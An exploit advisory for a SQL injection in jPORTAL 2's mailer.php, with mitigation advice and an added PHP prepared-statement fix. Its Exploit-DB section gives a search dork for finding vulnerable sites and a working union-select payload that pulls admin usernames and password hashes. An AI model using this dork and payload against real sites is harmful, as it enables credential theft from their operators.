Vendor: jPORTAL 2
By: Kacper
CVSS: 7.5 HIGH
Remote SQL Injection
CWE: 89
Product Name: jPORTAL 2
Affected Version From: jPORTAL 2
Affected Version To: jPORTAL 2
Patch Exists: NO
Platforms Tested:
2007

jPORTAL 2 Remote SQL Injection Vulnerability

The vulnerability allows an attacker to execute SQL queries on the jPORTAL 2 mailer.php page. By injecting a malicious SQL query, an attacker can retrieve sensitive information, such as usernames and passwords, from the admins table. The exploit can be executed by appending a union select statement to the 'to' parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
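
One way to apply the mitigation above, as an added example that is not jPORTAL's code and not part of the original advisory: the `to` value is allow-listed, bound through a PDO prepared statement, and HTML-encoded before it is written into the hidden field. The `users` table, its columns, the function names and the assumption that `to` is a numeric id are hypothetical; the demo rows are constructed and live in an in-memory SQLite database (requires pdo_sqlite).

```php
<?php
declare(strict_types=1);

// Added example: NOT jPORTAL's code. The "users" table, its columns and the
// idea that "to" is a numeric id are assumptions made for illustration.

function lookupRecipient(PDO $db, string $rawTo): ?string
{
    // 1. Allow-list the input: 1 to 9 digits only, anything else is rejected
    //    before it gets near the database.
    if (!preg_match('/\A[0-9]{1,9}\z/', $rawTo)) {
        return null;
    }
    // 2. Prepared statement: the value is bound as an integer parameter and
    //    is never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT nick FROM users WHERE id = :id LIMIT 1');
    $stmt->bindValue(':id', (int) $rawTo, PDO::PARAM_INT);
    $stmt->execute();
    $nick = $stmt->fetchColumn();
    return $nick === false ? null : (string) $nick;
}

function renderHiddenTo(?string $nick): string
{
    if ($nick === null) {
        return '<p>Unknown recipient.</p>';
    }
    // 3. Encode on output so database content cannot break out of the
    //    value="..." attribute of the hidden field.
    $safe = htmlspecialchars($nick, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="to" value="' . $safe . '">';
}

// Constructed demo data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, nick TEXT)');
$db->exec("INSERT INTO users (id, nick) VALUES (1, 'alice')");

// A valid id, an unknown id, and a non-numeric value of the kind shown in
// the raw data below; the last one never reaches the query.
foreach (['1', '42', "999999999999' union select"] as $to) {
    echo str_pad($to, 28), ' => ', renderHiddenTo(lookupRecipient($db, $to)), PHP_EOL;
}
```

With a MySQL backend, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so parameters are bound by the server rather than interpolated client-side.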

Exploit-DB raw data:

Title: jPORTAL 2 Remote SQL Injection Vulnerability
dork:[ intext:"jPORTAL 2" & inurl:"mailer.php" ]

Author: Kacper
E-Mail: kacper1964@yahoo.pl
Site: devilteam.eu

Irc: irc.myg0t.com #devilteam

Bug:

mailer.php?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*

After the query has run, just look in the page source and search for:

<input type="hidden" name="cmd" value="sendmail"><input type="hidden" name="to" value="admin:9b3a80a898fabc984e733d904027cc91"></td>

value="admin:9b3a80a898fabc984e733d904027cc91" < ----/  this is the result of your SQL query.

be safe all  :) 

# milw0rm.com [2007-11-06]